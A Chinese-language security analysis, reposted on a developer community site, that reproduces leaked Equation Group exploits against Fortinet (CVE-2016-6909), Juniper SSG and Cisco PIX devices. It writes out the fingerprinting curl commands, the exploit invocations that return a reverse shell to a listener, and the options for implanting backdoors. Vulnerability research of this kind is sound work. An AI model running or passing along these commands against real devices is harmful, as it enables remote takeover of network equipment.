开发者社区> 晚来风急> 正文

NSA(美国国安局)泄漏Exploit分析

简介:
+关注继续查看

*本文原创作者:tigerlab,本文属FreeBuf原创奖励计划,未经许可禁止转载

2016年8月16日,黑客团伙“The Shadow Brokers”声称自己入侵了“Equation Group“(方程式组织),并将他们从该黑客组织的计算机系统中所获取到的部分黑客工具泄漏在了互联网上。

泰格实验室第一时间对此次泄露的文件进行了深入分析,多数漏洞的验证分析情况已有同行分享,现将我们对另外三个未见分析的漏洞的验证分析分享给大家,其中包括fortinet、juniper、Cisco三种设备漏洞。

1、fortinet漏洞验证

该漏洞主要是Cookie解析器存在缓冲区溢出漏洞,远程攻击者可通过发送特制的HTTP请求利用该漏洞执行任意代码。

CVE编号:CVE-2016-6909

以下版本受到影响:

Fortinet FortiOS 4.1.11之前的4.x版本,

4.2.13之前的4.2.x版本,

4.3.9之前的4.3.x版本,

FortiSwitch 3.4.3之前的版本。

漏洞验证过程如下:

获取目标etag 判断版本类型

curl -X HEAD –v http://xxx.xxx.xxx.xxx/

Etag:480d772a

如果etag小于4DXXXXXX,适用版本 3;

如果etag 大于 4DXXXXXX,判断是否需要cookienum

curl -X HEAD –v http://xxx.xxx.xxx.xxx/login

APSCOOKIE=0&0 ,在执行命令时不需要设置cookienum

APSCOOKIE_2930800995=0&0 ,在执行命令时需要设置cookienum,且版本为4nc

测试etag小于4DXXXXXX,且不存在cookienum

1)获取溢出地址

判断etag是否在存在于配置文件EGBL.config中,例:

如不存在可通过以下命令获取堆栈地址:

./egregiousblunder_3.0.0.1 -t xxx.xxx.xxx.xxx-p 80 -l 5432 –ssl 0 -v –config ./EGBL.config –wam 10

该命令只适用于etag小于4DXXXXXX,且不存在cookienum,在其他版本中均失效,无法获取堆栈地址。

命令执行如下:

成功获取堆栈地址 0Xbffff274

2)执行shellcode,返回shell

可通过直接传入stack堆栈地址来反弹shell,

./egregiousblunder_3.0.0.1 -t xxx.xxx.xxx.xxx -p 80 -l 5432 --ssl 0 -v --stack 0xbffff274 --nopen --gen 3

也可将etag写入配置文件

ETAG = 480d772a : 0xbffff274

./egregiousblunder_3.0.0.1 -t xxx.xxx.xxx.xxx -p 80 -l 5432 --ssl 0 -v –etag 480d772a --nopen --gen 3 --config ./EGBL.config

5.png

  已成功返回shell,执行-ls命令获取文件目录信息。

本次测试主要低版本的飞塔设备,etag小于4DXXXXXX。由于未深入该漏洞exploit溢出过程,所以针对其他版本无法通过命令获取stack的,通过配置文件中的内存地址遍历进行了测试,也可以成功反弹shell。

2、juniper漏洞验证

该漏洞需要先获得juniper设备口令,在根据设备版本型号进行攻击,获取系统权限。

telnet登陆获取设备版本信息

设备版本号是ssg5ssg20.6.1.0r2.0,查看Dats里面是否存在该设备文件

漏洞复现

在BARGLEE文件夹中BICE-3110是juniper漏洞利用程序

./BICE-3110 -R ... //目标ip

-D 127.0.0.1 //接收反弹shell 主机ip

-d 5555 //接收反弹shell 主机端口

-m telnet //登陆模式 ssh/telnet

-t ../..//Dats/ssg5ssg20.6.1.0r2.0.xml //攻击代码配置

-u netscreen //设备账号

-p netscreen //设备口令

成功之后返回设备基本信息,可选择2种shell权限,juniper交互shell及BI shell。

Interactiver Console 实际就是juinper telnet进去之后的命令操作。

BI shell

可见可以执行的选项共有6项:

返回目标状态

卸载BARGLEE

安装BARGLEE

读内存

写内存

命令执行

根据script中BARICE.txt安装说明,尝试进行barglee植入

多次尝试bin文件类型,均未能成功植入,不能对其进行深入性分析。

3、Cisco EPBA漏洞验证

该漏洞与juniper一样需要先获取设备口令,之后通过溢出攻击获取系统权限。

漏洞复现

显示结果为received mtu –EPBA: ok, payload: ok,表示溢出成功。

与此同时,PIX722 防火墙控制端则会显示缓冲区溢出

接下来我们根据操作提示执行bride-1120这个脚本, 在执行“1”选项后可以判断是否正常连接,连接成功则返回Session D-H Key

执行“8”之后可以查看BRICE的自带shell功能。

多次尝试写入BatigerlabnanaGlee提示版本不对无法写入。

分析发现其读取目标文件前4个字节来得到版本号,通过对文件夹内所有文件进

行了搜索也未找到合适的植入程序。

总结

本文主要分享的是forinet、juniper、cisco三个漏洞利用文件的验证思路及过程。在

分析过程中我们进行了大量测试实验,想尽可能还原其整个攻击流程,但由于部分关键文件缺失,未能继续对其进行完整分析。如果有小伙伴有更好的分析思路,可与我们交流。

本文转自d1net(转载)

版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。

相关文章
阿里云服务器ECS远程登录用户名密码查询方法
阿里云服务器ECS远程连接登录输入用户名和密码,阿里云没有默认密码,如果购买时没设置需要先重置实例密码,Windows用户名是administrator,Linux账号是root,阿小云来详细说下阿里云服务器远程登录连接用户名和密码查询方法
20733 0
如何设置阿里云服务器安全组?阿里云安全组规则详细解说
阿里云安全组设置详细图文教程(收藏起来) 阿里云服务器安全组设置规则分享,阿里云服务器安全组如何放行端口设置教程。阿里云会要求客户设置安全组,如果不设置,阿里云会指定默认的安全组。那么,这个安全组是什么呢?顾名思义,就是为了服务器安全设置的。安全组其实就是一个虚拟的防火墙,可以让用户从端口、IP的维度来筛选对应服务器的访问者,从而形成一个云上的安全域。
16832 0
阿里云服务器如何登录?阿里云服务器的三种登录方法
购买阿里云ECS云服务器后如何登录?场景不同,大概有三种登录方式:
8358 0
阿里云服务器端口号设置
阿里云服务器初级使用者可能面临的问题之一. 使用tomcat或者其他服务器软件设置端口号后,比如 一些不是默认的, mysql的 3306, mssql的1433,有时候打不开网页, 原因是没有在ecs安全组去设置这个端口号. 解决: 点击ecs下网络和安全下的安全组 在弹出的安全组中,如果没有就新建安全组,然后点击配置规则 最后如上图点击添加...或快速创建.   have fun!  将编程看作是一门艺术,而不单单是个技术。
17809 0
阿里云服务器ECS登录用户名是什么?系统不同默认账号也不同
阿里云服务器Windows系统默认用户名administrator,Linux镜像服务器用户名root
12909 0
+关注
9379
文章
243
问答
文章排行榜
最热
最新
相关电子书
更多
OceanBase 入门到实战教程
立即下载
阿里云图数据库GDB,加速开启“图智”未来.ppt
立即下载
实时数仓Hologres技术实战一本通2.0版(下)
立即下载